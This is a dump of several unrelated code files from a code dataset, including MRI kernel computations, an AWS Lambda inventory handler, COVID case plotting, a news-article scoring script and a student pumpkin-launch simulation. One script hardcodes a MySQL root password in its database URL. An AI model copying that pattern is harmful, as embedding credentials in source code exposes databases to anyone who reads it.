np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:]\n y_z = (y-mean)/(1.0 if nostd else std)\n with h5py.File(f\"x_{normalizationmode}.h5\", \"r\") as hf:\n x = hf['x']\n n = len(train_ids)\n chunks = x.chunks\n kmeanrow = torch.zeros(1,1,1,1,n)\n Nmask = mask.sum()\n for i in range(x.shape[2]//x.chunks[2]):\n for j in range(x.shape[3]//x.chunks[3]):\n for k in range(x.shape[4]//x.chunks[4]):\n print([i,j,k])\n maxi = (i+1)*chunks[2]\n maxj = (j+1)*chunks[3]\n maxk = (k+1)*chunks[4]\n\n nmask = mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ].sum()\n if nmask == 0:\n continue\n r = np.concatenate([x[ii:ii+1,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ] for ii in train_ids], axis=0)\n r = r.astype(np.float32)\n ry = y_z[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n r = torch.Tensor(r)\n #mean = r.mean(dim=0, keepdim=True)\n r -= mean[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n #ry -= mean\n #std = r.std(dim=0, keepdim=True)\n if not nostd:\n r /= std[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n #ry /= std\n r = r*mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n ry = ry*mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n r = r.view(r.shape[0],-1)\n ry = ry.view(ry.shape[0],-1)\n \n localkernelrow = torch.matmul(ry, torch.transpose(r,0,1)).view(1,1,1,1,n)/nmask\n kmeanrow += localkernelrow*nmask/Nmask\n print(kmeanrow[0,0,0,0,0])\n return kmeanrow\n\ndef compute_kernelrow(y, normalizationmode, nostd=False):\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask.nii\").get_fdata()\n mask = mask[:192,2:226,:192][None,None,:,:,:]\n mask = torch.Tensor(mask)\n Nmask = mask.sum()\n train_ids, _ = create_train_idxs(395)\n with h5py.File(f\"icov_x_{normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:]\n std = np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:]\n yz = (y-mean)\n if not nostd:\n yz /= std\n with h5py.File(f\"x_{normalizationmode}.h5\", \"r\") as hf:\n x = hf['x']\n kmeanrow = torch.zeros(1,1,1,1,len(train_ids))\n for i in train_ids:\n print(i)\n xi = torch.Tensor((x[i].astype(np.float32)-mean)/(1.0 if nostd else std))\n kmeanrow[0,0,0,0,i] = torch.sum((yz*xi)*mask/Nmask)\n print(kmeanrow[0,0,0,0,i])\n return kmeanrow\n \n\ndef main2(args):\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask.nii\").get_fdata()\n mask = mask[:192,2:226,:192][None,None,:,:,:]\n Nmask = mask.sum()\n mask = torch.Tensor(mask)\n with h5py.File(f\"icov_x_{args.normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:]\n std = np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:]\n with h5py.File(f\"x_{args.normalizationmode}.h5\", \"r\") as hf:\n with h5py.File(f\"localkernel_{args.normalizationmode}{'_nostd' if args.nostd else ''}.h5\", \"w\") as hfout:\n x = hf['x']\n n = x.shape[0]\n chunks = x.chunks\n kmean = torch.zeros(1,1,1,n,n)\n for i in range(x.shape[2]//x.chunks[2]):\n for j in range(x.shape[3]//x.chunks[3]):\n for k in range(x.shape[4]//x.chunks[4]):\n print([i,j,k])\n maxi = (i+1)*chunks[2]\n maxj = (j+1)*chunks[3]\n maxk = (k+1)*chunks[4]\n\n nmask = mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ].sum()\n if nmask > 0:\n r = x[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ].astype(np.float32)\n r = torch.Tensor(r)\n r -= mean[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n if not args.nostd:\n r /= std[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n #mean = r.mean(dim=0, keepdim=True)\n #r -= mean\n #print(mean[0,:,0,0,0])\n #std = r.std(dim=0, keepdim=True)\n #r /= std\n r = r*mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n r = r.view(r.shape[0],-1)\n localkernel = torch.matmul(r, torch.transpose(r,0,1)).view(1,1,1,n,n)/nmask\n kmean += localkernel*nmask/Nmask\n #print(kmean)\n else:\n localkernel = torch.zeros(1,1,1,n,n)\n if i==0 and j==0 and k==0:\n hfout.create_dataset('localkernel', data = localkernel.cpu().numpy().astype(np.float32), \n dtype=np.float32, chunks=(1,1,1,n,n) ,\n maxshape=(*(x.chunks[2:]), n, n), **hdf5plugin.Blosc())\n else:\n s = hfout[\"localkernel\"].shape\n hfout[\"localkernel\"].resize((max(i+1,s[0]),max(j+1,s[1]),max(k+1,s[2]),n,n))\n hfout[\"localkernel\"][i:i+1,j:j+1,k:k+1] = localkernel.cpu().numpy().astype(np.float32)\n hfout.create_dataset('kernel', data=kmean.cpu().numpy().astype(np.float32), dtype=np.float32, **hdf5plugin.Blosc())\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"parse args\")\n\n parser.add_argument('-n','--normalizationmode', default=\"z\", type=str, help='normalization mode')\n\n parser.add_argument('--nostd', action='store_true', default=False, help='whether not to divide by std')\n \n args = parser.parse_args()\n print(args)\n main2(args)","repo_name":"vsaase/simpleBAD","sub_path":"pcakernel.py","file_name":"pcakernel.py","file_ext":"py","file_size_in_byte":12762,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"8694342521","text":" \nfrom example2jira import *\n\n\nlist = [ {\"file\" : \"legend1\",\n\t \"data\" : [\"z500.grb\", \"t850.grb\"],\n \"title\" : \"Vertical legend with user defined text\"},\n\t {\"file\" : \"legend2\",\n \"data\" : [\"t850.grb\"],\n\t \"title\" : \"Disjoint legend with user defined labels\"},\n\t {\"file\" : \"legend3\",\n \"data\" : [\"z500.grb\", \"t850.grb\"],\n \"title\" : \"Positional and histogram legend\"} ]\n\nprepare(\"legend.json\", list, \"Legend examples\")\n\nput(\"legend.json\", \"Legend examples\", \"Legend examples\")\n\n\n\n\n","repo_name":"adanese88/magics","sub_path":"docs/confluence/legend/tojira.py","file_name":"tojira.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"4911761358","text":"import os\nimport uuid\nimport json\nimport boto3\nfrom decimal import Decimal\n\n#conecta com a tabela do bd\ndef conect_db():\n table_name = os.environ['TABLE']\n region = os.environ['REGION']\n aws_environment = os.environ['AWSENV']\n db_conection = os.environ['DBLOCALURL']\n \n # Check if executing locally or on AWS, and configure DynamoDB connection accordingly.\n if aws_environment == \"AWS_SAM_LOCAL\":\n table = boto3.resource('dynamodb', endpoint_url=db_conection).Table(table_name)\n \n else:\n # AWS\n table = boto3.resource('dynamodb', region_name=region).Table(table_name)\n \n return table\n\n\ndef lambda_handler(event, context):\n \n try:\n\n items = json.loads(event['body'], parse_float=Decimal)\n\n product_table = conect_db()\n\n if event['path'] == \"/inventory/add-products/\":\n \n if items['id'] and items['nome'] and items[\"valor\"] and items[\"quantidade\"] and items['ativo']:\n \n product_table.put_item(Item=items)\n \n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(f'Produto cadastrado!')}\n\n else:\n msg = ''\n\n for key,item in items.items():\n try:\n if item['id'] and item['nome'] and item[\"valor\"] and item[\"quantidade\"] and item['ativo']: \n product_table.put_item(Item=item)\n msg += f\"item {key} cadastrado, \" \n \n except:\n msg += f\"item {key} invalido, \"\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(msg)}\n except:\n response = {\n \"statusCode\": 400,\n \"body\": json.dumps(f'Bad request!')}\n\n return response\n","repo_name":"David-Marcoss/MyShop-AWS-Serverless-Microsservices","sub_path":"Inventory_api/Inventory-app/src/AddProductFunction/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2068482467","text":"import matplotlib.pyplot as plt\nimport pandas as pd \nimport numpy as np\nfrom matplotlib import colors as mcolors\nimport random\nimport time\n\ntoday = time.strftime(\"%m/%d/%Y\")[1:][:-2]\n\ndf = pd.read_csv('data/latest.csv')\n\ndf_sum = df\n#uniq = df['Country/Region'].unique()\nuniq = ['US']\ndf_final = pd.DataFrame()\nnumber_of_days = 5\n\nfor country in uniq:\n country_code = df['Country/Region']==country\n df_coutry = df[country_code]\n df_coutry = df_coutry.sort_values(by=[today], ascending=False)\n df_coutry = df_coutry.head(10)\n \n column_list = list(df_coutry)\n column_list.remove('Country/Region')\n column_list.remove('Lat')\n column_list.remove('Long')\n \n dfToBeT = df_coutry[column_list]\n dfToBeT = dfToBeT.groupby(['Province/State']).sum()\n print(dfToBeT)\n dfT = dfToBeT.T\n dfT['date'] = dfT.index \n dfT = dfT[-number_of_days:]\n print(dfT)\n column_list_T = list(dfT)\n column_list_T.remove('date')\n\n column_val = {}\n for column in column_list_T:\n column_val[column] = dfT[column][today]\n\n sorted_column_val = sorted(column_val.items(), key=lambda x: x[1], reverse=True)\n\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n colors_to_draw = []\n\n for color in mcolors.TABLEAU_COLORS:\n colors_to_draw.append(color)\n\n index = 0\n final_column_list = []\n for i in range(len(sorted_column_val)):\n final_column_list.append(sorted_column_val[i][0])\n \n for column in final_column_list:\n plt.plot( 'date' , column, data=dfT, marker='', color=colors_to_draw[index], linewidth=2, label=column)\n plt.legend()\n index = index + 1\n plt.show()\n","repo_name":"sumitbahl/coronavirusdailyreport","sub_path":"coronavirus_daily_visualizer.py","file_name":"coronavirus_daily_visualizer.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38536618853","text":"import subprocess\nimport pandas as pd\nimport sys\nimport os\n\npath_runinfo = sys.argv[1]\noutput_path = sys.argv[2]\ndf_runinfo = pd.read_csv(path_runinfo)\nfor index, row in df_runinfo.iterrows():\n if row[\"SampleName\"] in [\"GSM4455935\", \"GSM4455933\"]:\n specific_output = os.path.join(output_path, row[\"SampleName\"])\n if not os.path.isdir(specific_output):\n os.mkdir(specific_output)\n wget_process = subprocess.Popen([\"wget\", \"-P\", specific_output, row[\"download_path\"]])\n wget_process.wait()\n\n","repo_name":"olopade-lab/COMIRI","sub_path":"WIP/download_sra.py","file_name":"download_sra.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"43144257920","text":"#monotonic function\n#binary serach O(nlogn)\n#more the maximum value of banana considered, less the number of hours required\n#so monotonic, we can apply bs..\n\n\n# do check it \\U0001f447\n#EXACTLY SAME AS : https://leetcode.com/problems/minimized-maximum-of-products-distributed-to-any-store/\n# also see : https://leetcode.com/problems/heaters/\n\n\n'''\n# minimise maximum, so we return do hi = mid for valid case, and return low\n\n# if it was maximise minimum, then we will do li = mid +1 for valid case and return li - 1\n# keep something extra in r...bcz (l H: return False\n return True\n\n'''\n\nvery important ques\nalso see: https://www.lintcode.com/problem/848/description\n\n\nclass Solution {\npublic:\n double minmaxGasDist(vector &s, int k) {\n // Write your code here\n double l = 0;\n double r = s.back() - s[0];\n double ans = r;\n while(l + 0.000001 < r){\n double m = l + (r-l)/2.0;\n //cout<&s , int k){\n int c = 0; // total number of gas station needed to have max distance as m\n for(int i = 1;ik){\n return false; // bcz we need c stations to keep maximum distance as m, but we are allowed only k, so some part of stance will be more than m , thus we wont have maximum as m\n }\n else{\n return true;\n }\n \n }\n};\n\n\n'''","repo_name":"hardik302001/leetcode","sub_path":"problems/koko_eating_bananas/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27086929631","text":"class Solution:\n def longestStrChain(self, words: List[str]) -> int:\n memo, word_set = {}, set(words)\n def dfs(word):\n if len(word) == 1: return 1\n if word in memo: return memo[word]\n rslt = 0\n for i in range(len(word)):\n if word[:i] + word[i+1:] in word_set:\n rslt = max(rslt, dfs(word[:i] + word[i+1:]))\n memo[word] = rslt + 1\n return rslt + 1\n rslt = 0\n for word in words[::-1]:\n rslt = max(rslt, dfs(word))\n return rslt\n","repo_name":"Mela2014/lc_punch","sub_path":"lc1048_dfs.py","file_name":"lc1048_dfs.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5449527393","text":"\nprint()\nlista=[]\nx=(int(input(\"Introduca con un número la cantidad de palabras que desea insertar en la lista del programa: \")))\nprint()\nfor i in range(x):\n lista.append(input(\"Introduzca una palabra: \"))\n\nlista_invertida=[]\nfor elem in lista:\n lista_invertida.append(elem[::-1])\n\ndef inversas(lista): \n lista_inv_2=[]\n for word in lista:\n if word in lista_invertida:\n lista_inv_2.append(word)\n return lista_inv_2\n\nprint(\"\\nLas palabras inversas ingresadas son: \")\nprint(inversas(lista))\nprint(\"\\n Programa Finalizado...\\n\")\n","repo_name":"jose137sp/lab3-py","sub_path":"problema4.py","file_name":"problema4.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34719804756","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom collections import Counter\n\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport sys\nsys.path.append('..')\nfrom modals import Base, Article, Cluster\n\ndb_url = \"mysql://root:Hunter1?23@localhost/newsapp?charset=utf8&use_unicode=0\"\n\nengine = create_engine(db_url, echo=False)\n\n#Base.metadata.drop_all(engine)\nBase.metadata.create_all(engine)\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nstop_words = set(stopwords.words('english'))\n\nclusters = session.query(Cluster).all()\nfor cluster in clusters:\n articles = cluster.articles\n article_titles = [a.title for a in articles]\n \n vectorizer = CountVectorizer()\n article_vectors = vectorizer.fit_transform(article_titles)\n \n word_counts = [len(t) for t in article_titles]\n max_word_count = max(word_counts)\n min_word_count = min(word_counts)\n\n articles_ages = [(cluster.last_updated - a.date_created).total_seconds() / 3600 for a in articles]\n max_article_age = max(articles_ages)\n min_article_age = min(articles_ages)\n\n if len(articles) > 2:\n for i, article in enumerate(articles):\n # calculate normalized article age\n article_age = (articles_ages[i] - min_article_age) / (max_article_age - min_article_age)\n print(1 - article_age)\n #print(\"Time Difference: \" + str(time_difference))\n \n # get similarity between article and other articles\n \n sims = cosine_similarity(article_vectors[i], article_vectors)[0]\n avg_sim = sum(sims) / len(sims)\n #print(\"avg sim: \" + str(avg_sim))\n\n # calculate normalized word count\n word_count = (word_counts[i] - min_word_count) / (max_word_count - min_word_count)\n #print(\"word count: \" + str(word_count))\n \n score = ((1 - word_count) * .5) + avg_sim + (1 - article_age)\n\n print(f\"{article.title}: {score}\")\n # Kool - calculus, physics\n # SIDES - french\n print(\"\\n\")\n \"\"\"\n articles = cluster.articles\n if len(articles) > 2:\n titles = []\n for a in articles:\n titles.append(a.title.decode('utf-8').lower())\n \n word_tokens = word_tokenize(' '.join(titles))\n\n filtered_words = [w for w in word_tokens if not w in stop_words and len(w)>2]\n\n c = Counter(filtered_words)\n ordered_words = c.most_common()\n \n for a in articles:\n title_text = a.title.decode('utf8').lower()\n score = 0\n for w, f in ordered_words:\n score += title_text.count(w) * (f - 1)\n score = score / (len(title_text.split()) / 2)\n print(str(a.title) + \" - \" + str(score))\n \n #for word, freq in ordered_words:\n # print(word)\n \n \n \n print(\"\\n\\n\")\n \"\"\" \n# get top keywords from all titles\n# number of keywords included / # of words in title\n\n\n","repo_name":"Grocode87/news.api2","sub_path":"Uploader/top_article/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22751876270","text":"import ijson\nfrom shapely.geometry import shape, Point\n\nf = open('render_geojson/data//S_USA.AdministrativeForest/usa.geojson')#LNDCVR_California_State_Shape(1)/Shape/LandCover_Woodland3.geojson')\nobjects = ijson.items(f, 'features.item')\noutput = open(\"final.geo.json\", \"w+\")\ngeometry = (o for o in objects)\nprint(\"here\") \noutput_features = []\n#этот файл пойнтс.птс это все точки с которыми мы работаем. там 10000\npoints_file = open('points.pts').read()\npoints = points_file.split(\",\")\n# point = Point( -121.5000000, 37.5000000)\n# points = [point]\n#Так как геоджсон очень блять большой, я пытался сохранить только те полигоны в которых есть эти 10к точек\n#логика вышла неправильной. я не смог найти эти полигоны \n# КАРОЧ ОСТАВШАЯСЯ ПРОБЛЕМА ЭТО ТУПО НАЙТИ ТИП ТЕРРЕЙНА В ЭТИХ 10к точках\nfor point in points:\n\tprint(point)\n\tcurr = point.replace(\"[\", \"\").replace(\"]\", \"\").split(\"; \")\n\ttemp_point = Point(-105.86660302, 37.4499334)#Point( float(curr[0]), float(curr[1]))\n\tis_found = 0\n\tfor feature in output_features:\n\t\t# print(feature)\n\t\tpolygon = shape(feature['geometry'])\n\t\tif polygon.contains(point):\n\t\t\tis_found = 1\n\tif is_found:\n\t\tcontinue\n\tfor feature in geometry:\n\t\t# print(feature['geometry']['coordinates'][0][0])\n\t\tpolygon = shape(feature['geometry'])\n\t\t#вот тут тупо метод контейнс возращал тру или фолс \n\t\tif polygon.contains(temp_point):\n\t\t\tprint(\"found one\")\n\t\t\toutput_features.append(feature)\nprint(output_features)\noutput.write(output_features)\n \n \n\n# import json\n# # depending on your version, use: from shapely.geometry import shape, Point\n\n# # load GeoJSON file containing sectors\n# with open('LNDCVR_California_State_Shape(1)/Shape/LandCover_Woodland3.geojson') as f:\n# js = json.load(f)\n\n# # construct point based on lon/lat returned by geocoder\n# print(\"we're starting...\")\n# # check each polygon to see if it contains the point\n# for feature in js['features']:\n","repo_name":"adilnaut/firesim","sub_path":"wxwidget/scripts/polygonfilter.py","file_name":"polygonfilter.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"38063695272","text":"# ------------------------------------------------------\n# Problem 1\n# ------------------------------------------------------\nimport math\nimport random\nimport pumpkin_display\nimport matplotlib.pyplot as plt\nimport cisc106\n\n# Global Constants\nSCREEN_WIDTH = pumpkin_display.SCREEN_WIDTH\nSCREEN_HEIGHT = pumpkin_display.SCREEN_HEIGHT\n# Add your global constants here\nSCREEN_WIDTH = pumpkin_display.SCREEN_WIDTH\nSCREEN_HEIGHT = pumpkin_display.SCREEN_HEIGHT\nPUMPKIN_X = 25\nPUMPKIN_Y_MIN = 0\nPUMPKIN_Y_MAX = SCREEN_HEIGHT // 2\nPUMPKIN_ANGLE_MIN = 0\nPUMPKIN_ANGLE_MAX = 80\nPUMPKIN_v0_MIN = 10\nPUMPKIN_v0_MAX = 100\nGRAVITY = -9.81\n\n# ------------------------------------------------------\n# Problem 2 \n# ------------------------------------------------------\n# Add your get_valid_integer function here\n# The function get_valid_integer consumes (prompt, the minimum, and maximum values)\n#to determine wether the number entered for height, angle, and velocity of the pumpkin is in the range of possiblities \ndef get_valid_integer(prompt, minimum, maximum):\n while True:\n try:\n n = int(input(prompt))\n if minimum <= n <= maximum:\n return n\n print(\"Invalid attempt the number entered was not in between \", minimum, \" and \", maximum)\n except:\n print(\"Please enter an integer\")\n\n#------------------------------------------------------\n# Problem 3\n#------------------------------------------------------\n# Add your get_yes_or_no function here\n# The function get_yes_or_no consumes a string (either \"yes\" or \"no\") and returns the users answer\ndef get_yes_or_no(string):\n yes_no = input(\"Enter yes or no \")\n # This while loop takes the input from the user and if that input is not equal to yes or no\n #it asks for a new input of yes or no until yes or no is inputted\n while(yes_no.lower()!=\"yes\" and yes_no.lower()!=\"no\"):\n print(\"Invalid Input\")\n yes_no = input(\"Enter yes or no \")\n #Once a yes or a no is inputted the result is returned\n return yes_no\n\n#------------------------------------------------------\n# Problem 4\n#------------------------------------------------------\ndef set_up_target():\n \n # intially our target will be at a set location \n #x_target = SCREEN_WIDTH - 100\n #y_target = 100\n \n # after your program is developed and working correctly\n # set the target at a random location\n # using the following statements\n \n x_target = random.randrange(SCREEN_WIDTH // 2, SCREEN_WIDTH - 99, 50)\n y_target = random.randrange(10, (1 + SCREEN_HEIGHT // 5),10) \n \n print(\"Target is\", x_target,\" meters away and at a height =\",y_target)\n return x_target, y_target\n\n#------------------------------------------------------\n# Problem 5 A\n#------------------------------------------------------\n# Add your get_init_pumpkin_height here\n# The function get_init_pumpkin_height uses the get_valid_integer function\n# Then it asks for a users input on the height of the pumpkin\n# If the pumpkin is between the Max and Min values set up in the global constants then it returns the height\ndef get_init_pumpkin_height():\n height = get_valid_integer(\"Enter pumpkin height: \", PUMPKIN_Y_MIN, PUMPKIN_Y_MAX)\n return height\n\n#------------------------------------------------------\n# Problem 5 B\n#------------------------------------------------------\n# Add your get_pumpkin_angle here\n# The function get_pumpkin_angle uses the get_valid_integer function\n# Then it asks for a users input on the angle of the pumpkin's launch\n# If the pumpkin's angle is between the Max and Min values set up in the global constants then it returns the angle\ndef get_pumpkin_angle():\n angle = get_valid_integer(\"Enter the angle at which you would like to launch the pumkin: \", PUMPKIN_ANGLE_MIN, PUMPKIN_ANGLE_MAX)\n return angle\n\n#------------------------------------------------------\n# Problem 5 C\n#------------------------------------------------------\n# Add your get_pumpkin_v0 here\n# The function get_pumpkin_v0 uses the get_valid_integer function\n# Then it asks for a users input on the velocity of the pumpkin\n# If the pumpkin is between the Max and Min values set up in the global constants then it returns the velocity\ndef get_pumpkin_v0():\n v0 = get_valid_integer(\"Enter the velocity at which you would like to launch the pumpkin: \", PUMPKIN_v0_MIN, PUMPKIN_v0_MAX)\n return v0\n\n#------------------------------------------------------\n# Problem 6\n#------------------------------------------------------\n# Add your set_up_pumpkin function here\n# The function set_up_pumpkin takes the height, angle, and velocity returned from the functions\n# get_init_pumpkn_height, get_pumpkin_angle, and get_pumpkin_v0 and sets the values equal to variables\n# which can be returned by calling this function \ndef set_up_pumpkin():\n PUMPKIN_Y = 0\n PUMPKIN_Y = get_init_pumpkin_height()\n angle = get_pumpkin_angle()\n velocity = get_pumpkin_v0()\n return (PUMPKIN_X ,PUMPKIN_Y,angle,velocity)\n\n#------------------------------------------------------\n# Problem 7\n#------------------------------------------------------\n# Add your chunk_punkin function here\n# The function chunk_punkin consmes the velocity and the angle\n# then finds the velocity in the x direction and the velocity in the y direction\ndef chunk_punkin(v0, angle):\n # The radians function mst be used because the angles need to be converted from degrees to radians\n # for python to read\n angleRadian = math.radians(angle)\n vx = round(v0 * math.cos(angleRadian), 2)\n vy = round(v0 * math.sin(angleRadian), 2)\n return (vx, vy)\n\ncisc106.assertEqual(chunk_punkin(30,40),(22.98, 19.28))\ncisc106.assertEqual(chunk_punkin(60,90),(0.0, 60.0))\ncisc106.assertEqual(chunk_punkin(12,50),(7.71, 9.19))\ncisc106.assertEqual(chunk_punkin(30, 25),(27.19, 12.68))\ncisc106.assertEqual(chunk_punkin(80, 60), (40.00, 69.28))\n\n#------------------------------------------------------\n# Problem 8\n#------------------------------------------------------\n# Add your move_pumpkin function here\n# The move_pumpkin function takes the orignal x and y coordinates of the pumpkin\n# then adds the velocity coming from the x and y directions and adds it to them\n# The y direction is different from the x due to gravity\n# the new coordinates are returned as well as the new velocity in the y direction\ndef move_pumpkin(PUMPKIN_X, PUMPKIN_Y, vx, vy):\n NEW_PUMPKIN_X = (PUMPKIN_X + vx)\n NEW_PUMPKIN_Y = float(round(PUMPKIN_Y + vy + (0.5 * (GRAVITY)),2))\n NEW_Y_v0 = float(round((vy + GRAVITY),2))\n return (NEW_PUMPKIN_X, NEW_PUMPKIN_Y, NEW_Y_v0)\n\ncisc106.assertEqual(move_pumpkin(100, 150, 20, 25),(120, 170.09, 15.19))\ncisc106.assertEqual(move_pumpkin(300, 10, 50, -15), (350,-9.91, -24.81))\ncisc106.assertEqual(move_pumpkin(200, 50, 50, 33), (250, 78.09, 23.19))\ncisc106.assertEqual(move_pumpkin(100, 150, 20, 25),(120, 170.09, 15.19))\ncisc106.assertEqual(move_pumpkin(300, 10, 50, -15), (350,-9.91, -24.81))\n\n#------------------------------------------------------\n# Problem 9\n#------------------------------------------------------\n# Add your did_hit_target function here\n# The function did_hit_target consumes the x and y coordinates of both the pumpkin and the target\n# Then determines wether the pumpkin hit the target based off of the size of the target\n# And returns a boolean (True or False) for if t did or did not hit the target\ndef did_hit_target(PUMPKIN_X, PUMPKIN_Y, TARGET_X, TARGET_Y):\n if((abs(PUMPKIN_X-TARGET_X)<15) and abs(PUMPKIN_Y-TARGET_Y)<15):\n return True\n else:\n return False\n\ncisc106.assertEqual(did_hit_target(450, 100, 460, 105), True)\ncisc106.assertEqual(did_hit_target(450, 100, 460, 125), False)\ncisc106.assertEqual(did_hit_target(150, 20, 30, 100), False)\ncisc106.assertEqual(did_hit_target(99, 60, 300, 133), False)\ncisc106.assertEqual(did_hit_target(100, 0, 500, 100), False)\n#------------------------------------------------------\n# Problem 10\n#------------------------------------------------------\n# Add your is_off_screen function here\n# The function is_off_screen compares the x coordinate with the width of the screen to see if it went off the right side\n# the y coordinate with the height of the screen to see if the pumpkin has gone off the top of the screen\n# and compares both the x and y to 0 to see if the pumpkin went off the bottom or left of the screen \ndef is_off_screen(PUMPKIN_X, PUMPKIN_Y):\n if PUMPKIN_X > SCREEN_WIDTH and PUMPKIN_Y > SCREEN_HEIGHT:\n return False\n elif PUMPKIN_X < 0 and PUMPKIN_Y < 0:\n return False\n else:\n return True\n\ncisc106.assertEqual(is_off_screen(7777, 200),True)\ncisc106.assertEqual(is_off_screen(80, 4),True)\ncisc106.assertEqual(is_off_screen(1000, 601),False)\ncisc106.assertEqual(is_off_screen(100,-100), True)\ncisc106.assertEqual(is_off_screen(800, 100),True)\n \n#------------------------------------------------------\n# Problem 11\n#------------------------------------------------------\n# Add your compute_trajectory function here\n# The function compute_trajectory consumes the x and y coordinates of the targets,\n# the x and y coordinates of the pumpkin, the angle, and the velocity of the pumpkin\n# Then compiles a list where the new values of the x and y coordinates of the pumpkin can be stored\n# so that the x,y coordinates of the pumpkin can be paired and displayed on a graph\n# Then if the pumpkin hits the target or misses a statement is printed explaining and a list of the\n# x and y pumpkin corrdinates are returned\ndef compute_trajectory(x_target, y_target,x_pumpkin, y_pumpkin, angle_pumpkin, v_pumpkin):\n \n # initialize a list of x values. the first element should be the pumpkin’s initial x coordinate\n x_val_list=[x_pumpkin]\n x_val_list=[x_pumpkin]\n \n # initialize a list of y values. the first element should be the pumpkin’s initial y coordinate\n y_val_list=[y_pumpkin]\n y_val_list=[y_pumpkin]\n\n # chunk the pumpkin - call the chunk_pumpkin and assign the return values to \n # variables representing the speed in the x direction and the speed in the y direction\n speed=chunk_punkin(v_pumpkin,angle_pumpkin)\n x_velocity=speed[0]\n y_velocity=speed[1]\n\n complete=False\n \n # call move_pumpkin repeatedly until either the pumpkin is off the screen\n # or it hit the target\n # with each iteration, append the pumpkin's new x coordinate to the\n # end of the list of x values\n # and append the new y coordinate to the end of the list of y values\n while (did_hit_target(x_pumpkin,y_pumpkin,x_target,y_target)!=True) and complete==False:\n pumpkin_change=move_pumpkin(x_pumpkin,y_pumpkin,x_velocity,y_velocity)\n x_pumpkin=pumpkin_change[0]\n y_pumpkin=pumpkin_change[1]\n y_velocity=pumpkin_change[2]\n x_val_list.append(x_pumpkin)\n y_val_list.append(y_pumpkin)\n \n # if the pumpkin goes off screen - display a message to the user that they missed\n # if the pumpkin hit the target - display a message to the user that they hit the target\n if did_hit_target(x_pumpkin,y_pumpkin,x_target,y_target)==True:\n print(\"You have hit the target\")\n complete=True\n if (x_pumpkin>SCREEN_WIDTH) or (y_pumpkin>SCREEN_HEIGHT) or (y_pumpkin<0):\n print(\"You have missed the target\")\n complete=True\n \n # return the list of x values followed by the list of y values\n\n return (x_val_list),(y_val_list)\n\n\n#------------------------------------------------------\n# Problem 13\n#------------------------------------------------------\n# Add your plot_trajectory function here\n# Solve Problem 12 first\n# The function plot_trajectory consumes the x and y lists of the first and second attempts\n# as well as the labels associated with them and the x and y coordinates of the target\n# mat plot is then used to draw out the attempts and circles are displayed\n# the plots are returned \ndef plot_trajectory(X_LIST_1, Y_LIST_1, TAG_1, X_LIST_2, Y_LIST_2, TAG_2, X_TARGET, 